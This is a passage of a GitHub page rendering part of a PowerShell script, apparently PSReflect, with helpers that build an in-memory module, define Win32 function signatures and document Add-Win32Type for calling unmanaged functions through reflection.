class=\"pl-e\">[Guid]</span>::NewGuid<span class=\"pl-k\">()</span>.ToString<span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L71\" class=\"blob-num js-line-number\" data-line-number=\"71\"></td>\n        <td id=\"LC71\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L72\" class=\"blob-num js-line-number\" data-line-number=\"72\"></td>\n        <td id=\"LC72\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L73\" class=\"blob-num js-line-number\" data-line-number=\"73\"></td>\n        <td id=\"LC73\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">LoadedAssemblies</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[AppDomain]</span>::CurrentDomain.GetAssemblies<span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L74\" class=\"blob-num js-line-number\" data-line-number=\"74\"></td>\n        <td id=\"LC74\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L75\" class=\"blob-num js-line-number\" data-line-number=\"75\"></td>\n        <td id=\"LC75\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">foreach</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Assembly</span> <span class=\"pl-k\">in</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">LoadedAssemblies</span><span class=\"pl-k\">)</span> {</td>\n      </tr>\n      <tr>\n        <td id=\"L76\" class=\"blob-num js-line-number\" data-line-number=\"76\"></td>\n        <td id=\"LC76\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Assembly</span><span class=\"pl-en\">.FullName</span> <span class=\"pl-k\">-and</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Assembly</span><span class=\"pl-en\">.FullName.Split</span><span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;,&#39;</span><span class=\"pl-k\">)</span><span class=\"pl-e\">[</span><span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-e\">]</span> <span class=\"pl-k\">-eq</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ModuleName</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span> {</td>\n      </tr>\n      <tr>\n        <td id=\"L77\" class=\"blob-num js-line-number\" data-line-number=\"77\"></td>\n        <td id=\"LC77\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">return</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Assembly</span></td>\n      </tr>\n      <tr>\n        <td id=\"L78\" class=\"blob-num js-line-number\" data-line-number=\"78\"></td>\n        <td id=\"LC78\" class=\"blob-code blob-code-inner js-file-line\">            }</td>\n      </tr>\n      <tr>\n        <td id=\"L79\" class=\"blob-num js-line-number\" data-line-number=\"79\"></td>\n        <td id=\"LC79\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L80\" class=\"blob-num js-line-number\" data-line-number=\"80\"></td>\n        <td id=\"LC80\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L81\" class=\"blob-num js-line-number\" data-line-number=\"81\"></td>\n        <td id=\"LC81\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">DynAssembly</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> Reflection.AssemblyName<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">ModuleName</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L82\" class=\"blob-num js-line-number\" data-line-number=\"82\"></td>\n        <td id=\"LC82\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">Domain</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[AppDomain]</span>::CurrentDomain</td>\n      </tr>\n      <tr>\n        <td id=\"L83\" class=\"blob-num js-line-number\" data-line-number=\"83\"></td>\n        <td id=\"LC83\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">AssemblyBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Domain</span><span class=\"pl-en\">.DefineDynamicAssembly</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">DynAssembly</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&#39;Run&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L84\" class=\"blob-num js-line-number\" data-line-number=\"84\"></td>\n        <td id=\"LC84\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ModuleBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">AssemblyBuilder</span><span class=\"pl-en\">.DefineDynamicModule</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">ModuleName</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-c1\">False</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L85\" class=\"blob-num js-line-number\" data-line-number=\"85\"></td>\n        <td id=\"LC85\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L86\" class=\"blob-num js-line-number\" data-line-number=\"86\"></td>\n        <td id=\"LC86\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">return</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ModuleBuilder</span></td>\n      </tr>\n      <tr>\n        <td id=\"L87\" class=\"blob-num js-line-number\" data-line-number=\"87\"></td>\n        <td id=\"LC87\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L88\" class=\"blob-num js-line-number\" data-line-number=\"88\"></td>\n        <td id=\"LC88\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L89\" class=\"blob-num js-line-number\" data-line-number=\"89\"></td>\n        <td id=\"LC89\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L90\" class=\"blob-num js-line-number\" data-line-number=\"90\"></td>\n        <td id=\"LC90\" class=\"blob-code blob-code-inner js-file-line\">  <span class=\"pl-c\"># A helper function used to reduce typing while defining function</span></td>\n      </tr>\n      <tr>\n        <td id=\"L91\" class=\"blob-num js-line-number\" data-line-number=\"91\"></td>\n        <td id=\"LC91\" class=\"blob-code blob-code-inner js-file-line\">  <span class=\"pl-c\"># prototypes for Add-Win32Type.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L92\" class=\"blob-num js-line-number\" data-line-number=\"92\"></td>\n        <td id=\"LC92\" class=\"blob-code blob-code-inner js-file-line\">  <span class=\"pl-k\">function</span> <span class=\"pl-en\">func</span></td>\n      </tr>\n      <tr>\n        <td id=\"L93\" class=\"blob-num js-line-number\" data-line-number=\"93\"></td>\n        <td id=\"LC93\" class=\"blob-code blob-code-inner js-file-line\">  {</td>\n      </tr>\n      <tr>\n        <td id=\"L94\" class=\"blob-num js-line-number\" data-line-number=\"94\"></td>\n        <td id=\"LC94\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">Param</span></td>\n      </tr>\n      <tr>\n        <td id=\"L95\" class=\"blob-num js-line-number\" data-line-number=\"95\"></td>\n        <td id=\"LC95\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L96\" class=\"blob-num js-line-number\" data-line-number=\"96\"></td>\n        <td id=\"LC96\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 0</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L97\" class=\"blob-num js-line-number\" data-line-number=\"97\"></td>\n        <td id=\"LC97\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[String]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L98\" class=\"blob-num js-line-number\" data-line-number=\"98\"></td>\n        <td id=\"LC98\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L99\" class=\"blob-num js-line-number\" data-line-number=\"99\"></td>\n        <td id=\"LC99\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L100\" class=\"blob-num js-line-number\" data-line-number=\"100\"></td>\n        <td id=\"LC100\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 1</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L101\" class=\"blob-num js-line-number\" data-line-number=\"101\"></td>\n        <td id=\"LC101\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[string]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L102\" class=\"blob-num js-line-number\" data-line-number=\"102\"></td>\n        <td id=\"LC102\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FunctionName</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L103\" class=\"blob-num js-line-number\" data-line-number=\"103\"></td>\n        <td id=\"LC103\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L104\" class=\"blob-num js-line-number\" data-line-number=\"104\"></td>\n        <td id=\"LC104\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 2</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L105\" class=\"blob-num js-line-number\" data-line-number=\"105\"></td>\n        <td id=\"LC105\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L106\" class=\"blob-num js-line-number\" data-line-number=\"106\"></td>\n        <td id=\"LC106\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnType</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L107\" class=\"blob-num js-line-number\" data-line-number=\"107\"></td>\n        <td id=\"LC107\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L108\" class=\"blob-num js-line-number\" data-line-number=\"108\"></td>\n        <td id=\"LC108\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 3</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L109\" class=\"blob-num js-line-number\" data-line-number=\"109\"></td>\n        <td id=\"LC109\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type[]]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L110\" class=\"blob-num js-line-number\" data-line-number=\"110\"></td>\n        <td id=\"LC110\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">ParameterTypes</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L111\" class=\"blob-num js-line-number\" data-line-number=\"111\"></td>\n        <td id=\"LC111\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L112\" class=\"blob-num js-line-number\" data-line-number=\"112\"></td>\n        <td id=\"LC112\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 4</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L113\" class=\"blob-num js-line-number\" data-line-number=\"113\"></td>\n        <td id=\"LC113\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Runtime.InteropServices.CallingConvention]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L114\" class=\"blob-num js-line-number\" data-line-number=\"114\"></td>\n        <td id=\"LC114\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">NativeCallingConvention</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L115\" class=\"blob-num js-line-number\" data-line-number=\"115\"></td>\n        <td id=\"LC115\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L116\" class=\"blob-num js-line-number\" data-line-number=\"116\"></td>\n        <td id=\"LC116\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 5</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L117\" class=\"blob-num js-line-number\" data-line-number=\"117\"></td>\n        <td id=\"LC117\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Runtime.InteropServices.CharSet]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L118\" class=\"blob-num js-line-number\" data-line-number=\"118\"></td>\n        <td id=\"LC118\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Charset</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L119\" class=\"blob-num js-line-number\" data-line-number=\"119\"></td>\n        <td id=\"LC119\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L120\" class=\"blob-num js-line-number\" data-line-number=\"120\"></td>\n        <td id=\"LC120\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Switch]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L121\" class=\"blob-num js-line-number\" data-line-number=\"121\"></td>\n        <td id=\"LC121\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">SetLastError</span></td>\n      </tr>\n      <tr>\n        <td id=\"L122\" class=\"blob-num js-line-number\" data-line-number=\"122\"></td>\n        <td id=\"LC122\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L123\" class=\"blob-num js-line-number\" data-line-number=\"123\"></td>\n        <td id=\"LC123\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L124\" class=\"blob-num js-line-number\" data-line-number=\"124\"></td>\n        <td id=\"LC124\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">Properties</span> <span class=\"pl-k\">=</span> @{</td>\n      </tr>\n      <tr>\n        <td id=\"L125\" class=\"blob-num js-line-number\" data-line-number=\"125\"></td>\n        <td id=\"LC125\" class=\"blob-code blob-code-inner js-file-line\">            DllName <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">DllName</span></td>\n      </tr>\n      <tr>\n        <td id=\"L126\" class=\"blob-num js-line-number\" data-line-number=\"126\"></td>\n        <td id=\"LC126\" class=\"blob-code blob-code-inner js-file-line\">            FunctionName <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">FunctionName</span></td>\n      </tr>\n      <tr>\n        <td id=\"L127\" class=\"blob-num js-line-number\" data-line-number=\"127\"></td>\n        <td id=\"LC127\" class=\"blob-code blob-code-inner js-file-line\">            ReturnType <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ReturnType</span></td>\n      </tr>\n      <tr>\n        <td id=\"L128\" class=\"blob-num js-line-number\" data-line-number=\"128\"></td>\n        <td id=\"LC128\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L129\" class=\"blob-num js-line-number\" data-line-number=\"129\"></td>\n        <td id=\"LC129\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L130\" class=\"blob-num js-line-number\" data-line-number=\"130\"></td>\n        <td id=\"LC130\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">ParameterTypes</span><span class=\"pl-k\">)</span> { <span class=\"pl-k\">$</span><span class=\"pl-smi\">Properties</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;ParameterTypes&#39;</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ParameterTypes</span> }</td>\n      </tr>\n      <tr>\n        <td id=\"L131\" class=\"blob-num js-line-number\" data-line-number=\"131\"></td>\n        <td id=\"LC131\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">NativeCallingConvention</span><span class=\"pl-k\">)</span> { <span class=\"pl-k\">$</span><span class=\"pl-smi\">Properties</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;NativeCallingConvention&#39;</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">NativeCallingConvention</span> }</td>\n      </tr>\n      <tr>\n        <td id=\"L132\" class=\"blob-num js-line-number\" data-line-number=\"132\"></td>\n        <td id=\"LC132\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Charset</span><span class=\"pl-k\">)</span> { <span class=\"pl-k\">$</span><span class=\"pl-smi\">Properties</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;Charset&#39;</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Charset</span> }</td>\n      </tr>\n      <tr>\n        <td id=\"L133\" class=\"blob-num js-line-number\" data-line-number=\"133\"></td>\n        <td id=\"LC133\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">SetLastError</span><span class=\"pl-k\">)</span> { <span class=\"pl-k\">$</span><span class=\"pl-smi\">Properties</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;SetLastError&#39;</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">SetLastError</span> }</td>\n      </tr>\n      <tr>\n        <td id=\"L134\" class=\"blob-num js-line-number\" data-line-number=\"134\"></td>\n        <td id=\"LC134\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L135\" class=\"blob-num js-line-number\" data-line-number=\"135\"></td>\n        <td id=\"LC135\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c1\">New-Object</span> PSObject <span class=\"pl-k\">-</span>Property <span class=\"pl-k\">$</span><span class=\"pl-smi\">Properties</span></td>\n      </tr>\n      <tr>\n        <td id=\"L136\" class=\"blob-num js-line-number\" data-line-number=\"136\"></td>\n        <td id=\"LC136\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L137\" class=\"blob-num js-line-number\" data-line-number=\"137\"></td>\n        <td id=\"LC137\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L138\" class=\"blob-num js-line-number\" data-line-number=\"138\"></td>\n        <td id=\"LC138\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L139\" class=\"blob-num js-line-number\" data-line-number=\"139\"></td>\n        <td id=\"LC139\" class=\"blob-code blob-code-inner js-file-line\">  <span class=\"pl-k\">function</span> <span class=\"pl-en\">Add-Win32Type</span></td>\n      </tr>\n      <tr>\n        <td id=\"L140\" class=\"blob-num js-line-number\" data-line-number=\"140\"></td>\n        <td id=\"LC140\" class=\"blob-code blob-code-inner js-file-line\">  {</td>\n      </tr>\n      <tr>\n        <td id=\"L141\" class=\"blob-num js-line-number\" data-line-number=\"141\"></td>\n        <td id=\"LC141\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">&lt;#</span></td>\n      </tr>\n      <tr>\n        <td id=\"L142\" class=\"blob-num js-line-number\" data-line-number=\"142\"></td>\n        <td id=\"LC142\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">SYNOPSIS</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L143\" class=\"blob-num js-line-number\" data-line-number=\"143\"></td>\n        <td id=\"LC143\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L144\" class=\"blob-num js-line-number\" data-line-number=\"144\"></td>\n        <td id=\"LC144\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Creates a .NET type for an unmanaged Win32 function.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L145\" class=\"blob-num js-line-number\" data-line-number=\"145\"></td>\n        <td id=\"LC145\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L146\" class=\"blob-num js-line-number\" data-line-number=\"146\"></td>\n        <td id=\"LC146\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Author: Matthew Graeber (@mattifestation)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L147\" class=\"blob-num js-line-number\" data-line-number=\"147\"></td>\n        <td id=\"LC147\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    License: BSD 3-Clause</span></td>\n      </tr>\n      <tr>\n        <td id=\"L148\" class=\"blob-num js-line-number\" data-line-number=\"148\"></td>\n        <td id=\"LC148\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Required Dependencies: None</span></td>\n      </tr>\n      <tr>\n        <td id=\"L149\" class=\"blob-num js-line-number\" data-line-number=\"149\"></td>\n        <td id=\"LC149\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Optional Dependencies: func</span></td>\n      </tr>\n      <tr>\n        <td id=\"L150\" class=\"blob-num js-line-number\" data-line-number=\"150\"></td>\n        <td id=\"LC150\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"> </span></td>\n      </tr>\n      <tr>\n        <td id=\"L151\" class=\"blob-num js-line-number\" data-line-number=\"151\"></td>\n        <td id=\"LC151\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">DESCRIPTION</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L152\" class=\"blob-num js-line-number\" data-line-number=\"152\"></td>\n        <td id=\"LC152\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L153\" class=\"blob-num js-line-number\" data-line-number=\"153\"></td>\n        <td id=\"LC153\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Add-Win32Type enables you to easily interact with unmanaged (i.e.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L154\" class=\"blob-num js-line-number\" data-line-number=\"154\"></td>\n        <td id=\"LC154\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Win32 unmanaged) functions in PowerShell. After providing</span></td>\n      </tr>\n      <tr>\n        <td id=\"L155\" class=\"blob-num js-line-number\" data-line-number=\"155\"></td>\n        <td id=\"LC155\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Add-Win32Type with a function signature, a .NET type is created</span></td>\n      </tr>\n      <tr>\n        <td id=\"L156\" class=\"blob-num js-line-number\" data-line-number=\"156\"></td>\n        <td id=\"LC156\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    using reflection (i.e. csc.exe is never called like with Add-Type).</span></td>\n      </tr>\n      <tr>\n        <td id=\"L157\" class=\"blob-num js-line-number\" data-line-number=\"157\"></td>\n        <td id=\"LC157\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L158\" class=\"blob-num js-line-number\" data-line-number=\"158\"></td>\n        <td id=\"LC158\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The &#39;func&#39; helper function can be used to reduce typing when defining</span></td>\n      </tr>\n      <tr>\n        <td id=\"L159\" class=\"blob-num js-line-number\" data-line-number=\"159\"></td>\n        <td id=\"LC159\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    multiple function definitions.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L160\" class=\"blob-num js-line-number\" data-line-number=\"160\"></td>\n        <td id=\"LC160\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L161\" class=\"blob-num js-line-number\" data-line-number=\"161\"></td>\n        <td id=\"LC161\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">DllName</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L162\" class=\"blob-num js-line-number\" data-line-number=\"162\"></td>\n        <td id=\"LC162\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L163\" class=\"blob-num js-line-number\" data-line-number=\"163\"></td>\n        <td id=\"LC163\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The name of the DLL.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L164\" class=\"blob-num js-line-number\" data-line-number=\"164\"></td>\n        <td id=\"LC164\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L165\" class=\"blob-num js-line-number\" data-line-number=\"165\"></td>\n        <td id=\"LC165\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">FunctionName</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L166\" class=\"blob-num js-line-number\" data-line-number=\"166\"></td>\n        <td id=\"LC166\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L167\" class=\"blob-num js-line-number\" data-line-number=\"167\"></td>\n        <td id=\"LC167\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The name of the target function.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L168\" class=\"blob-num js-line-number\" data-line-number=\"168\"></td>\n        <td id=\"LC168\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L169\" class=\"blob-num js-line-number\" data-line-number=\"169\"></td>\n        <td id=\"LC169\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">ReturnType</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L170\" class=\"blob-num js-line-number\" data-line-number=\"170\"></td>\n        <td id=\"LC170\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L171\" class=\"blob-num js-line-number\" data-line-number=\"171\"></td>\n        <td 